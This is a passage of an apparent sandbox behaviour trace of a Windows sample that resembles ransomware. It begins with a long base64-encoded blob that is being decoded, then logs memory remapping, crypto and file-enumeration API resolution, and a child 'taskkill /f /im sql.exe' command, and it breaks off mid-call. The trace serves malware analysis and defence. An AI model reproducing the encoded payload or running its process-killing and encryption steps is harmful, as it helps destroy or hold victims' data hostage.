6Cv5ypuZW7uqf2haz/gr9kp/mVu7un9quTvtTa5OTc5c/SyJjF34vm/9yHQbX7u6f2hazRvf7K5djx5NrLmurPv/HL+Mf5lTfo5/YN/7+CO8/HuRXo+6eK1uz/+uzch83G+7svpcWsj9H/nOvq1bvT9LaFyKzCv/zU+ZW7u6f2haz/gr+ch7mVu7un9oWs/42/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+Th7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHtpW7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbS7p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7mVu7uo9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2iqz/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrPCCv5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4KwnIe5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+ciLmVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZq7u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu0p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7mVu7un+YWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW7u6f2haP/gr+ch7mVu7un9oWs/4K/nIe5lbu7p/aFrP+Nv5yHuZW7u6f2haz/gr+ch7mVu7un9oWs/4K/k4e5lbu7p/aFrP+Cv5yHuZW7u6f2haz/gr+ch7aVu7un9oWs/4K/nIe5lbu7p/aFrP+Cv5yHuZW0u6f2haz/gr+ch7mVu7un9oWs/4K/nIe5lbu7qPaFrP+Cv5yHuZW7u6f2haz/gr9kp/mVu7un9quTvtTd/ePm8MPYwobxxZDs/+/z3dX7u++ixazCMf+cxAHVuy/ztoWRTMK/3z/5lV/v5/a4H7+C/CTHuaHu+6fjPOz/wQfch+z70NXIgeuMmvrc+ffN/NTVp/aF5KrCv21V+ZUr7uf2oPu/gvwkx7n32t+Hl+nAkOHe6O7W+7u7xIXoTP6Cv5yHuZW7u6f2ha//gr+8giqMu7un9oWs/4I3qca5dY76p7Xq3rr61ujXy/rY3tSFhaySgsyc5Ln6u8mnk4XJ/6y/+IfVlde7p/b3rIqC0Zzzufy71qeThYz/57/uh8uV1LvV9qWs/4K/nIq5n7u7p/aF+P/Ov9OH6pXou4f24KyNgs2c6Lnnu7an/IWs/9G/1Yf3lfy7h/bgrI2CzZzouee7tqf8haz/gr/Yh/aV9rvm9syssYKfnOK557vJp5mF3v+Pv5aHuZW7u/X2s6zPgoyctLmYu7Gn24WM/8O/6IfNld67yvb1rIuCn5zzufq7m6eDhd//57+8h/SV6Lvu9sms34LcnOi58bvep9aFyv/wv/OH1JWbu9P27ayWgsycp7n0u8inhYXJ/++//ofVlcK7h/bhrIqCzZzuufu73KfWhcL/47/oh9CVzbvC9qWsnILQnOO58Lubp5+Fwv/rv+iH0JXau8v27KyFgt6c87n8u9SnmIWm/9a/9IfQlci7h/bsrJGC25zuufa72qeChcn/8b+8h9iVm7vF9vCsmIKfnO65+7ubp4+Fw//3v+6HmZXau9f29ayTgtac5Ln0u8+nn4XD/+y/soeZlfK70/alrJaCzJynufi71KeFhdj/or/wh9CV0LvC9umshoKfnPO5/bvep9aF3v/nv++HzJXXu9P2payQgtmcp7n2u9qnmoXA/+u/8ofelZu7xvbrrN+C8pzUudy796fbhc//7b/xh8mV0rvL9uCsm4KfnK+5urvYp5qF3v+rv7yH35XOu8n25qyLgtac6Ln7u5unkIXe/+2/8YeZldq7h/brrJ6Cy5zuueO73qfWhc//7b/yh8qVz7vV9vCsnILLnOi557ubp5mF3v+iv/qHy5XUu8r2pay7gtOc67nYu9qnn4XC/6y/kYezlbu7p/bXrMmCj5y0uae7tqf8hYH/or/yh9aVz7uH9uCskYLQnPK58rvTp9aF3//yv/2H2pXeu4f246yQgs2cp7n5u9SnlYXN/+6/+YeZldK7yfbjrJCCzZzqufS7z6efhcP/7L+Rh7OVu7un9tesyYKPnLS5pLu2p/yFgf+iv92HzZXPu8L26KyPgsucp7nhu9Sn1oXF/+y/9YfNldK7xvbprJaCxZziubW7z6eehcn/or/fh+uV77uH9uiskILNnOK5tbvPp56Fzf/sv7yH1pXVu8T24KzRgrWc07n9u9KnhYWM/+u/8ofdldK7xPbkrIuC2pz0ubW72qfWhc7/97/7h5mV0rvJ9qWshoLQnPK557ubp5eF3P/yv/CH0JXYu8b28ayWgtCc6bm7u7an/IWs/4K/zoePlYu7lPa1rPKCtZyqubW7+Kekhfj/or/yh9aVz7uH9uyskYLWnPO5/Lvap5qFxf/4v/mH3ZW2u632haz/gu2csbmlu4mnzoWh/4i/sYeZlc67yfbkrJ2C05ziubW7z6eZhYz/67/yh9CVz7vO9uSsk4LWnP258Lubp56Fyf/jv+yHtJWxu6f2haz/gr+c1bmju4unxIWb/4+/loeUlZu7yfbqrIuCn5ziufu71KeDhcv/6r+8h8qVy7vG9uasmoKfnOG5+rvJp9aFwP/tv+uH0JXUu4f27KyRgtac87n8u9qnmoXF//i//YfNldK7yPbrrPKCtZyHuZW7u6f2hf7/tL+sh4uVjbuq9o+s0oKfnOm5+rvPp9aFyf/sv/OHzJXcu8/2payMgs+c5rn2u96n1oXK/+2/7oeZlci70/bhrJaC0Jynufy71aefhdj/67/9h9WV0rvd9uSsi4LWnOi5+7u2p/yFrP+Cv5yHuZXpu5H2tazNgoqcirmfu5an1oXc//e/7ofclZu70fbsrI2Cy5zyufS716fWhcr/97/yh9qVz7vO9uqskYKfnOS59LvXp5qFof+Iv5yHuZW7u/X2s6zPgo2cs7mYu7Gn24WM/+y/84fNlZu7wvbrrJCCypzguf27m6eFhdz/47//h9yVm7vB9uqsjYKfnNi5+rvVp5OF1P/rv+iHlpXau9P24KyHgtac87m1u8+nl4XO/+6/+Ye0lbG7p/aFrP+Cv5zVuaO7i6fHhZX/j7+Wh5SVm7vS9uusnoLdnOu58Lubp4KFw/+iv/OHyZXeu8n2paycgtCc6bnmu9SnmoXJ/6K/+Ifclc27zvbmrJqCspyNuZW7u6f2haz/0L+qh4mViruf9ois9YKSnKe54LvVp5OF1P/yv/mH2pXPu8L24azfgtec4rn0u8un1oXJ//C/7ofWlcm7qvaPrP+Cv5yHuZW76afAhZz/s7+rh7SVsbuK9qWsioLRnOK57bvLp5OFz//2v/mH3ZWbu8r28KyTgsuc7rnhu9OnhIXJ/+O/+IeZlde7yPbmrJSCn5ziuee7yaeZhd7/j7+Wh7mVu7un9oWsrYKJnLe5pLuNp/uFpv+vv7yH15XUu9P2payagtGc6Lngu9ynnoWM//G/7IfYldi7wvalrJmC0Jz1ubW7z6eehd7/57/9h92Vm7vD9uSsi4LenIq5n7u7p6SFmv+yv62HiZW2u632qKzfgt6c5bn6u8mngoWE/6u/vIfRldq71PalrJ2C2pziufu7m6eVhc3/7r/wh9yV37uq9o+s/4K/nNW5o7uLp8aFlf+Pv5aHlJWbu8n26qyLgp+c4rn7u9Sng4XL/+q/vIfKlcu7xvbmrJqCn5zhufq7yafWhcn/7L/qh9CVybvI9uuskoLanOm54bu2p/yFrP/Qv6qHiZWLu5/2iKz1gpKcp7n7u9SngoWM/+e/8ofWlc67wPbtrN+CzJz3ufS72KeThYz/5L/zh8uVm7vG9vesmILKnOq58LvVp4KF3/+Pv5aHuZW7u6f216zJgo+ct7mnu7an/IWB/6K/+ofVldS7xvbxrJaC0ZzgubW7y6eZhcX/7L/oh5mVyLvS9vWsj4LQnPW54bubp5iFw//2v7yH1ZXUu8b24ayagtucirmfu7un9oWs/4K", cchString=0x24b4c, dwFlags=0x1, pbBinary=0x1a0000, pcbBinary=0x18fc44, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1a0000, pcbBinary=0x18fc44, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0045.139] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18f3d4 | out: DllHandle=0x18f3d4*=0x76c20000) returned 0x0 [0045.139] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0045.139] GetSystemDirectoryA (in: lpBuffer=0x18f84c, uSize=0x200 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.139] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18f3b8 | out: DllHandle=0x18f3b8*=0x76c20000) returned 0x0 [0045.140] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0045.140] CreateFileA (lpFileName="C:\\Windows\\system32sppsvc.exe" (normalized: "c:\\windows\\system32sppsvc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.140] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18f3b8 | out: DllHandle=0x18f3b8*=0x76c20000) returned 0x0 [0045.140] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0045.141] CreateFileA (lpFileName="C:\\Windows\\system32\\mspaint.exe" (normalized: "c:\\windows\\system32\\mspaint.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc0 [0045.143] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18f3cc | out: DllHandle=0x18f3cc*=0x76c20000) returned 0x0 [0045.143] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0045.144] GetFileSize (in: hFile=0xc0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x614e00 [0045.144] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fae0 | out: DllHandle=0x18fae0*=0x76c20000) returned 0x0 [0045.144] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0045.145] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fae0 | out: DllHandle=0x18fae0*=0x76c20000) returned 0x0 [0045.145] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0045.145] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fae0 | out: DllHandle=0x18fae0*=0x76c20000) returned 0x0 [0045.146] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0045.146] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fb38 | out: DllHandle=0x18fb38*=0x76c20000) returned 0x0 [0045.146] NtCreateSection (in: SectionHandle=0x18fbd8, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0xc0 | out: SectionHandle=0x18fbd8*=0xc4) returned 0x0 [0045.192] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xffffffff, BaseAddress=0x18fd10*=0x400000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fcc4*=0x17000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x18fd10*=0x400000, SectionOffset=0x0, ViewSize=0x18fcc4*=0x17000) returned 0xc0000018 [0045.192] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xffffffff, BaseAddress=0x18fd10*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fcc4*=0x17000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x18fd10*=0x240000, SectionOffset=0x0, ViewSize=0x18fcc4*=0x17000) returned 0x40000003 [0045.192] VirtualProtect (in: lpAddress=0x240000, dwSize=0x17000, flNewProtect=0x4, lpflOldProtect=0x18fb68 | out: lpflOldProtect=0x18fb68*=0x2) returned 1 [0045.247] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0045.247] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileAttributesW") returned 0x76c4d4f7 [0045.247] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0045.247] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0045.247] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0045.247] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0045.247] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0045.247] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0045.247] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileW") returned 0x76c5830d [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameA") returned 0x76c4b6e0 [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="GetDiskFreeSpaceExA") returned 0x76cb434f [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="GetDriveTypeA") returned 0x76c4ef75 [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDrives") returned 0x76c35371 [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5 [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiW") returned 0x76c4d5cd [0045.248] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForMultipleObjects") returned 0x76c34220 [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileW") returned 0x76c49af0 [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2 [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointer") returned 0x76c317d1 [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0045.249] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryW") returned 0x76c3492b [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0045.250] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineA") returned 0x76c351a1 [0045.251] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSetInformation") returned 0x76c35651 [0045.251] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0045.251] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0045.251] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0045.251] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0045.251] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0045.251] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0045.251] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0045.251] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0045.251] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0045.251] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="HeapCreate") returned 0x76c34a2d [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedIncrement") returned 0x76c31400 [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedDecrement") returned 0x76c313f0 [0045.252] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="SetHandleCount") returned 0x76c3cb29 [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0045.253] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0045.253] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0045.254] GetProcAddress (hModule=0x74f40000, lpProcName="CharUpperA") returned 0x74f5fdca [0045.254] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0045.254] GetProcAddress (hModule=0x74d40000, lpProcName="CryptExportKey") returned 0x74d491ea [0045.254] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0045.254] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0045.254] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExA") returned 0x74d54907 [0045.254] GetProcAddress (hModule=0x74d40000, lpProcName="RegCreateKeyExA") returned 0x74d51469 [0045.254] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExA") returned 0x74d548ef [0045.254] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExA") returned 0x74d514b3 [0045.254] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGenKey") returned 0x74d48ee9 [0045.254] GetProcAddress (hModule=0x74d40000, lpProcName="CryptImportKey") returned 0x74d4c532 [0045.254] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0045.255] GetProcAddress (hModule=0x74d40000, lpProcName="GetUserNameA") returned 0x74d6a4b4 [0045.255] GetProcAddress (hModule=0x74d40000, lpProcName="GetCurrentHwProfileA") returned 0x74d811f8 [0045.255] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0045.255] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0045.255] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyKey") returned 0x74d4c51a [0045.255] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0045.255] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0045.255] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0045.255] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0045.255] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0045.255] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteA") returned 0x76217078 [0045.255] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0045.256] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0045.256] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0045.256] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x753d0000 [0046.449] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenA") returned 0x753ff18e [0046.449] GetProcAddress (hModule=0x753d0000, lpProcName="InternetCloseHandle") returned 0x753eab49 [0046.450] GetProcAddress (hModule=0x753d0000, lpProcName="InternetReadFile") returned 0x753eb406 [0046.450] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenUrlA") returned 0x754130f1 [0046.450] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x74ad0000 [0046.517] GetProcAddress (hModule=0x74ad0000, lpProcName="GetFileVersionInfoA") returned 0x74ad1ced [0046.517] GetProcAddress (hModule=0x74ad0000, lpProcName="GetFileVersionInfoSizeA") returned 0x74ad1c9c [0046.517] GetProcAddress (hModule=0x74ad0000, lpProcName="VerQueryValueA") returned 0x74ad1b72 [0046.518] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fad0 | out: DllHandle=0x18fad0*=0x76c20000) returned 0x0 [0046.518] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0046.518] VirtualProtect (in: lpAddress=0x241000, dwSize=0x13e9c, flNewProtect=0x40, lpflOldProtect=0x18fb6c | out: lpflOldProtect=0x18fb6c*=0x4) returned 1 [0046.519] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fad0 | out: DllHandle=0x18fad0*=0x76c20000) returned 0x0 [0046.519] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0046.520] VirtualProtect (in: lpAddress=0x255000, dwSize=0x17f4, flNewProtect=0x2, lpflOldProtect=0x18fb6c | out: lpflOldProtect=0x18fb6c*=0x4) returned 1 [0046.520] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0046.520] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fac8 | out: DllHandle=0x18fac8*=0x76c20000) returned 0x0 [0046.520] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0046.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x24d91d, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcc [0046.524] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fca8 | out: DllHandle=0x18fca8*=0x76c20000) returned 0x0 [0046.524] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0046.524] WaitForSingleObject (hHandle=0xcc, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xa28 Thread: id = 3 os_tid = 0xab8 Thread: id = 4 os_tid = 0xabc Thread: id = 5 os_tid = 0xac0 Thread: id = 6 os_tid = 0xac4 Thread: id = 7 os_tid = 0xac8 Thread: id = 8 os_tid = 0xacc Thread: id = 9 os_tid = 0xb08 Thread: id = 24 os_tid = 0xb2c Thread: id = 25 os_tid = 0xb30 Thread: id = 165 os_tid = 0x8f8 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x15f04000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dc17" [0xc000000f], "LOCAL" [0x7] Thread: id = 10 os_tid = 0xa90 Thread: id = 11 os_tid = 0x824 Thread: id = 12 os_tid = 0x76c Thread: id = 13 os_tid = 0x758 Thread: id = 14 os_tid = 0x74c Thread: id = 15 os_tid = 0x72c Thread: id = 16 os_tid = 0x71c Thread: id = 17 os_tid = 0x718 Thread: id = 18 os_tid = 0x638 Thread: id = 19 os_tid = 0x154 Thread: id = 20 os_tid = 0x150 Thread: id = 21 os_tid = 0x12c Thread: id = 22 os_tid = 0x120 Thread: id = 23 os_tid = 0x3fc Thread: id = 210 os_tid = 0x8f4 Thread: id = 237 os_tid = 0x91c Thread: id = 277 os_tid = 0x5cc Thread: id = 287 os_tid = 0x880 Thread: id = 296 os_tid = 0x9e4 Thread: id = 299 os_tid = 0x974 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1611d000" os_pid = "0xb34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im sql.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 26 os_tid = 0xb38 [0060.267] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x37fa4c | out: lpSystemTimeAsFileTime=0x37fa4c*(dwLowDateTime=0x93dccb90, dwHighDateTime=0x1d57b18)) [0060.267] GetCurrentProcessId () returned 0xb34 [0060.267] GetCurrentThreadId () returned 0xb38 [0060.267] GetTickCount () returned 0x1149888 [0060.267] QueryPerformanceCounter (in: lpPerformanceCount=0x37fa44 | out: lpPerformanceCount=0x37fa44*=18048866302) returned 1 [0060.268] GetModuleHandleA 